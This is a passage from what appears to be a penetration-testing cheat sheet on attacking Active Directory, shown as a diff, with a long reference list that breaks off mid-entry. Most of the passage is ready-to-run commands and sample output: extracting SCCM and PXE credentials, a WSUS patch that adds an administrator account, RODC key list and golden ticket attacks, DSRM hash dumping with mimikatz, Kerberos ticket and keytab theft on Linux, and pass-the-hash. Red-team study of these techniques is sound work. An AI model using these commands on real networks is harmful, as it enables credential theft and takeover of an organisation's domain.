+## SCCM Network Access Accounts + +> If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials. + +On the machine. +* Find SCCM blob + ```ps1 + Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount" + NetworkAccessPassword : + NetworkAccessUsername : + ``` +* Using [GhostPack/SharpDPAPI](https://github.com/GhostPack/SharpDPAPI/blob/81e1fcdd44e04cf84ca0085cf5db2be4f7421903/SharpDPAPI/Commands/SCCM.cs#L208-L244) or [Mayyhem/SharpSCCM](https://github.com/Mayyhem/SharpSCCM) for SCCM retrieval and decryption + ```ps1 + .\SharpDPAPI.exe SCCM + .\SharpSCCM.exe get naa -u USERNAME -p PASSWORD + ``` +* Check ACL for the CIM repository located at `C:\Windows\System32\wbem\Repository\OBJECTS.DATA`: + ```ps1 + Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl + ConvertFrom-SddlString "" + ``` + +From a remote machine. +* Using [garrettfoster13/sccmhunter](https://github.com/garrettfoster13/sccmhunter) + ```ps1 + python3 ./sccmhunter.py http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip 10.10.10.10. -auto + ``` + + +## SCCM Shares + +> Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares + +* [1njected/CMLoot](https://github.com/1njected/CMLoot) + ```ps1 + Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt + Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml + Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi + ``` + + +## WSUS Deployment + +> Windows Server Update Services (WSUS) enables information technology administrators to deploy the latest Microsoft product updates. You can use WSUS to fully manage the distribution of updates that are released through Microsoft Update to computers on your network + +:warning: The payload must be a Microsoft signed binary and must point to a location on disk for the WSUS server to load that binary. + +* [SharpWSUS](https://github.com/nettitude/SharpWSUS) + +1. Locate using `HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate` or `SharpWSUS.exe locate` +2. After WSUS Server compromise: `SharpWSUS.exe inspect` +3. Create a malicious patch: `SharpWSUS.exe create /payload:"C:\Users\ben\Documents\pk\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user WSUSDemo Password123! /add ^& net localgroup administrators WSUSDemo /add\"" /title:"WSUSDemo"` +4. Deploy it on the target: `SharpWSUS.exe approve /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:"Demo Group"` +5. Check status deployment: `SharpWSUS.exe check /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local` +6. Clean up: `SharpWSUS.exe delete /updateid:5d667dfd-c8f0-484d-8835-59138ac0e127 /computername:bloredc2.blorebank.local /groupname:”Demo Group` + +## RODC - Read Only Domain Controller + +RODCs are an alternative for Domain Controllers in less secure physical locations +- Contains a filtered copy of AD (LAPS and Bitlocker keys are excluded) +- Any user or group specified in the **managedBy** attribute of an RODC has local admin access to the RODC server + + +### RODC Golden Ticket + +* You can forge an RODC golden ticket and present it to a writable Domain Controller only for principals listed in the RODC’s **msDS-RevealOnDemandGroup** attribute and not in the RODC’s **msDS-NeverRevealGroup** attribute + + +### RODC Key List Attack + +**Requirements**: +* [Impacket PR #1210 - The Kerberos Key List Attack](https://github.com/SecureAuthCorp/impacket/pull/1210) +* **krbtgt** credentials of the RODC (-rodcKey) +* **ID of the krbtgt** account of the RODC (-rodcNo) + +* using Impacket + ```ps1 + # keylistattack.py using SAMR user enumeration without filtering (-full flag) + keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full + + # keylistattack.py defining a target username (-t flag) + keylistattack.py -kdc server.domain.local -t user -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX LIST + + # secretsdump.py using the Kerberos Key List Attack option (-use-keylist) + secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist + ``` +* Using Rubeus + ```ps1 + Rubeus.exe golden /rodcNumber:25078 /aes256:eacd894dd0d934e84de35860ce06a4fac591ca63c228ddc1c7a0ebbfa64c7545 /user:admin /id:1136 /domain:lab.local /sid:S-1-5-21-1437000690-1664695696-1586295871 + Rubeus.exe asktgs /enctype:aes256 /keyList /service:krbtgt/lab.local /dc:dc1.lab.local /ticket:doIFgzCC[...]wIBBxhYnM= + ``` + + +### RODC Computer Object + +When you have one the following permissions to the RODC computer object: **GenericWrite**, **GenericAll**, **WriteDacl**, **Owns**, **WriteOwner**, **WriteProperty**. + +* Add a domain admin account to the RODC's **msDS-RevealOnDemandGroup** attribute + ```ps1 + PowerSploit> Set-DomainObject -Identity RODC$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')} + ``` + + +## PXE Boot image attack + +PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with it. + +- Press **[F8]** during the PXE boot to spawn an administrator console on the deployed machine. +- Press **[SHIFT+F10]** during the initial Windows setup process to bring up a system console, then add a local administrator or dump SAM/SYSTEM registry. + + ```powershell + net user hacker Password123! /add + net localgroup administrators /add hacker + ``` + +- Extract the pre-boot image (wim files) using [PowerPXE.ps1 (https://github.com/wavestone-cdt/powerpxe)](https://github.com/wavestone-cdt/powerpxe) and dig through it to find default passwords and domain accounts. + + ```powershell + # Import the module + PS > Import-Module .\PowerPXE.ps1 + + # Start the exploit on the Ethernet interface + PS > Get-PXEcreds -InterfaceAlias Ethernet + PS > Get-PXECreds -InterfaceAlias ÂŤ lab 0 Âť + + # Wait for the DHCP to get an address + >> Get a valid IP address + >>> >>> DHCP proposal IP address: 192.168.22.101 + >>> >>> DHCP Validation: DHCPACK + >>> >>> IP address configured: 192.168.22.101 + + # Extract BCD path from the DHCP response + >> Request BCD File path + >>> >>> BCD File path: \Tmp\x86x64{5AF4E332-C90A-4015-9BA2-F8A7C9FF04E6}.bcd + >>> >>> TFTP IP Address: 192.168.22.3 + + # Download the BCD file and extract wim files + >> Launch TFTP download + >>>> Transfer succeeded. + >> Parse the BCD file: conf.bcd + >>>> Identify wim file : \Boot\x86\Images\LiteTouchPE_x86.wim + >>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim + >> Launch TFTP download + >>>> Transfer succeeded. + + # Parse wim files to find interesting data + >> Open LiteTouchPE_x86.wim + >>>> Finding Bootstrap.ini + >>>> >>>> DeployRoot = \\LAB-MDT\DeploymentShare$ + >>>> >>>> UserID = MdtService + >>>> >>>> UserPassword = Somepass1 + ``` + +## DNS Reconnaissance + +Perform ADIDNS searches + +```powershell +StandIn.exe --dns --limit 20 +StandIn.exe --dns --filter SQL --limit 10 +StandIn.exe --dns --forest --domain redhook --user RFludd --pass Cl4vi$Alchemi4e +StandIn.exe --dns --legacy --domain redhook --user RFludd --pass Cl4vi$Alchemi4e +``` + +## DSRM Credentials + +> Directory Services Restore Mode (DSRM) is a safe mode boot option for Windows Server domain controllers. DSRM allows an administrator to repair or recover to repair or restore an Active Directory database. + +This is the local administrator account inside each DC. Having admin privileges in this machine, you can use mimikatz to dump the local Administrator hash. Then, modifying a registry to activate this password so you can remotely access to this local Administrator user. + +```ps1 +Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' + +# Check if the key exists and get the value +Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior + +# Create key with value "2" if it doesn't exist +New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD + +# Change value to "2" +Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 +``` + + +## Linux Active Directory + +## CCACHE ticket reuse from /tmp + +> When tickets are set to be stored as a file on disk, the standard format and type is a CCACHE file. This is a simple binary file format to store Kerberos credentials. These files are typically stored in /tmp and scoped with 600 permissions + +List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be reused by setting the environment variable with `export KRB5CCNAME=/tmp/ticket.ccache`. Kerberos ticket name format is `krb5cc_%{uid}` where uid is the user UID. + +```powershell +$ ls /tmp/ | grep krb5cc +krb5cc_1000 +krb5cc_1569901113 +krb5cc_1569901115 + +$ export KRB5CCNAME=/tmp/krb5cc_1569901115 +``` + + +## CCACHE ticket reuse from keyring + +Tool to extract Kerberos tickets from Linux kernel keys : https://github.com/TarlogicSecurity/tickey + +```powershell +# Configuration and build +git clone https://github.com/TarlogicSecurity/tickey +cd tickey/tickey +make CONF=Release + +[root@Lab-LSV01 /]# /tmp/tickey -i +[*] krb5 ccache_name = KEYRING:session:sess_%{uid} +[+] root detected, so... DUMP ALL THE TICKETS!! +[*] Trying to inject in tarlogic[1000] session... +[+] Successful injection at process 25723 of tarlogic[1000],look for tickets in /tmp/__krb_1000.ccache +[*] Trying to inject in velociraptor[1120601115] session... +[+] Successful injection at process 25794 of velociraptor[1120601115],look for tickets in /tmp/__krb_1120601115.ccache +[*] Trying to inject in trex[1120601113] session... +[+] Successful injection at process 25820 of trex[1120601113],look for tickets in /tmp/__krb_1120601113.ccache +[X] [uid:0] Error retrieving tickets +``` + +## CCACHE ticket reuse from SSSD KCM + +SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. +The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`. +By default, the key is only readable if you have **root** permissions. + +Invoking `SSSDKCMExtractor` with the --database and --key parameters will parse the database and decrypt the secrets. + +```powershell +git clone https://github.com/fireeye/SSSDKCMExtractor +python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey +``` + +The credential cache Kerberos blob can be converted into a usable Kerberos CCache file that can be passed to Mimikatz/Rubeus. + + +## CCACHE ticket reuse from keytab + +```powershell +git clone https://github.com/its-a-feature/KeytabParser +python KeytabParser.py /etc/krb5.keytab +klist -k /etc/krb5.keytab +``` + +## Extract accounts from /etc/krb5.keytab + +The service keys used by services that run as root are usually stored in the keytab file /etc/krb5.keytab. This service key is the equivalent of the service's password, and must be kept secure. + +Use [`klist`](https://adoptopenjdk.net/?variant=openjdk13&jvmVariant=hotspot) to read the keytab file and parse its content. The key that you see when the [key type](https://cwiki.apache.org/confluence/display/DIRxPMGT/Kerberos+EncryptionKey) is 23 is the actual NT Hash of the user. + +```powershell +$ klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab +[...] +[26] Service principal: host/COMPUTER@DOMAIN + KVNO: 25 + Key type: 23 + Key: 31d6cfe0d16ae931b73c59d7e0c089c0 + Time stamp: Oct 07, 2019 09:12:02 +[...] +``` + +On Linux you can use [`KeyTabExtract`](https://github.com/sosdave/KeyTabExtract): we want RC4 HMAC hash to reuse the NLTM hash. + +```powershell +$ python3 keytabextract.py krb5.keytab +[!] No RC4-HMAC located. Unable to extract NTLM hashes. # No luck +[+] Keytab File successfully imported. + REALM : DOMAIN + SERVICE PRINCIPAL : host/computer.domain + NTLM HASH : 31d6cfe0d16ae931b73c59d7e0c089c0 # Lucky +``` + +On macOS you can use `bifrost`. + +```powershell +./bifrost -action dump -source keytab -path test +``` + +Connect to the machine using the account and the hash with CME. + +```powershell +$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c0" -d "DOMAIN" +CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0 +``` + + +## Extract accounts from /etc/sssd/sssd.conf + +> sss_obfuscate converts a given password into human-unreadable format and places it into appropriate domain section of the SSSD config file, usually located at /etc/sssd/sssd.conf + +The obfuscated password is put into "ldap_default_authtok" parameter of a given SSSD domain and the "ldap_default_authtok_type" parameter is set to "obfuscated_password". + +```ini +[sssd] +config_file_version = 2 +... +[domain/LDAP] +... +ldap_uri = ldap://127.0.0.1 +ldap_search_base = ou=People,dc=srv,dc=world +ldap_default_authtok_type = obfuscated_password +ldap_default_authtok = [BASE64_ENCODED_TOKEN] +``` + +De-obfuscate the content of the ldap_default_authtok variable with [mludvig/sss_deobfuscate](https://github.com/mludvig/sss_deobfuscate) + +```ps1 +./sss_deobfuscate [ldap_default_authtok_base64_encoded] +./sss_deobfuscate AAAQABagVAjf9KgUyIxTw3A+HUfbig7N1+L0qtY4xAULt2GYHFc1B3CBWGAE9ArooklBkpxQtROiyCGDQH+VzLHYmiIAAQID +``` + + +## References + +* [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) +* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) +* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) +* [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf) +* [Abusing S4U2Self: Another Sneaky Active Directory Persistence - Alsid](https://alsid.com/company/news/abusing-s4u2self-another-sneaky-active-directory-persistence) +* [Attacks Against Windows PXE Boot Images - February 13th, 2018 - Thomas Elling](https://blog.netspi.com/attacks-against-windows-pxe-boot-images/) +* [BUILDING AND ATTACKING AN ACTIVE DIRECTORY LAB WITH POWERSHELL - @myexploit2600 & @5ub34x](https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/) +* [Becoming Darth Sidious: Creating a Windows Domain (Active Directory) and hacking it - @chryzsh](https://chryzsh.gitbooks.io/darthsidious/content/building-a-lab/building-a-lab/building-a-small-lab.html) +* [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf) +* [COMPROMISSION DES POSTES DE TRAVAIL GRÂCE À LAPS ET PXE MISC n° 103 - mai 2019 - RĂŠmi Escourrou, Cyprien Oger ](https://connect.ed-diamond.com/MISC/MISC-103/Compromission-des-postes-de-travail-grace-a-LAPS-et-PXE) +* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf) +* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/) +* [Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin](https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/) +* [Dumping Domain Password Hashes - Pentestlab](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/) +* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/) +* [Exploiting PrivExchange - April 11, 2019 - @chryzsh](https://chryzsh.github.io/exploiting-privexchange/) +* [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/) +* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288) +* [How Attackers Use Kerberos Silver Tickets to Exploit Systems - Sean Metcalf](https://adsecurity.org/?p=2011) +* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments) +* [Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html) +* [Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html) +* [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/) +* [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/) +* [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts - Roberto Rodriguez - Nov 28, 2018](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1) +* [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) +* [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/) +* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/) +* [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/) +* [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/) +* [Pen Testing Active Directory Environments - Part III: Chasing Power Users](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/) +* [Pen Testing Active Directory Environments - Part IV: Graph Fun](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/) +* [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/) +* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/) +* [Penetration Testing Active Directory, Part I - March 5, 2019 - Hausec](https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/) +* [Penetration Testing Active Directory, Part II - March 12, 2019 - Hausec](https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/) +* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/) +* [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/) +* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html) +* [Roasting AS-REPs - January 17, 2017 - harmj0y](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/) +* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa) +* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/) +* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/) +* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 1](https://akerva.com/blog/wonkachall-akerva-ndh-2018-write-up-part-1/) +* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 2](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-2/) +* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 3](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-3/) +* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 4](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-4/) +* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/) +* [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) +* [A Case Study in Wagging the Dog: Computer Takeover - Will Schroeder - Feb 28, 2019](https://posts.specterops.io/a-case-study-in-wagging-the-dog-computer-takeover-2bcb7f94c783) +* [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) +* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) +* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) +* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) +* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) +* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) +* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) +* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) +* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic) +* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https://www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/) +* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/) +* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) +* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) +* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0) +* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61) +* [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation) +* [GPO Abuse - Part 1 - RastaMouse - 6 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-1/) +* [GPO Abuse - Part 2 - RastaMouse - 13 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-2/) +* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/) +* [How To Attack Kerberos 101 - m0chan - July 31, 2019](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html) +* [ACE to RCE - @JustinPerdok - July 24, 2020](https://sensepost.com/blog/2020/ace-to-rce/) +* [Zerologon:Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472) - Tom Tervoort, September 2020](https://www.secura.com/pathtoimg.php?id=2055) +* [Access Control Entries (ACEs) - The Hacker Recipes - @_nwodtuhs](https://www.thehacker.recipes/active-directory-domain-services/movement/abusing-aces) +* [CVE-2020-17049: Kerberos Bronze Bit Attack – Practical Exploitation - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack/) +* [CVE-2020-17049: Kerberos Bronze Bit Attack – Theory - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory/) +* [Kerberos Bronze Bit Attack (CVE-2020-17049) Scenarios to Potentially Compromise Active Directory](https://www.hub.trimarcsecurity.com/post/leveraging-the-kerberos-bronze-bit-attack-cve-2020-17049-scenarios-to-compromise-active-directory) +* [GPO Abuse: "You can't see me" - Huy Kha - July 19, 2019](https://pentestmag.com/gpo-abuse-you-cant-see-me/) +* [Lateral movement via dcom: round 2 - enigma0x3 - January 23, 2017](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/) +* [New lateral movement techniques abuse DCOM technology - Philip Tsukerman - Jan 25, 2018](https://www.cybereason.com/blog/dcom-lateral-movement-techniques) +* [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html) +* [AD CS relay attack - practical guide - 23 Jun 2021 - @exandroiddev](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/) +* [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab) +* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html) +* [Attacking Active Directory: 0 to 0.9 - Eloy PĂŠrez GonzĂĄlez - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/) +* [Microsoft ADCS – Abusing PKI in Active Directory Environment - Jean MARSAULT - 14/06/2021](https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/) +* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/) +* [NTLM relaying to AD CS - On certificates, printers and a little hippo - Dirk-jan Mollema](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/) +* [Certified Pre-Owned Abusing Active Directory Certificate Services - @harmj0y @tifkin_](https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Certified-Pre-Owned-Abusing-Active-Directory-Certificate-Services.pdf) +* [Certified Pre-Owned - Will Schroeder - Jun 17 2021](https://posts.specterops.io/certified-pre-owned-d95910965cd2) +* [AD CS/PKI template exploit via PetitPotam and NTLMRelayx, from 0 to DomainAdmin in 4 steps by frank | Jul 23, 2021](https://www.bussink.net/ad-cs-exploit-via-petitpotam-from-0-to-domain-domain/) +* [NTLMv1_Downgrade.md - S3cur3Th1sSh1t - 09/07/2021](https://gist.github.com/S3cur3Th1sSh1t/0c017018c2000b1d5eddf2d6a194b7bb) +* [UnPAC the hash - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash) +* [Lateral Movement – WebClient](https://pentestlab.blog/2021/10/20/lateral-movement-webclient/) +* [Shadow Credentials: Workstation Takeover Edition - Matthew Creel](https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition) +* [Certificate templates - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/certificate-templates) +* [CA configuration - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration) +* [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls) +* [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints) +* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing) +* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) +* [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4) +* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) +* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) +* [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo MartĂ­nez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/) +* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/) +* [Introducing MalSCCM - Phil Keeble -May 4, 2022](https://labs.nettitude.com/blog/introducing-malsccm/) +* [Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) - Oliver Lyak](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4) +* [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html) +* [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/) +* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) +* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials) +* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/) +* [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9) +* [Diamond tickets - The Hacker 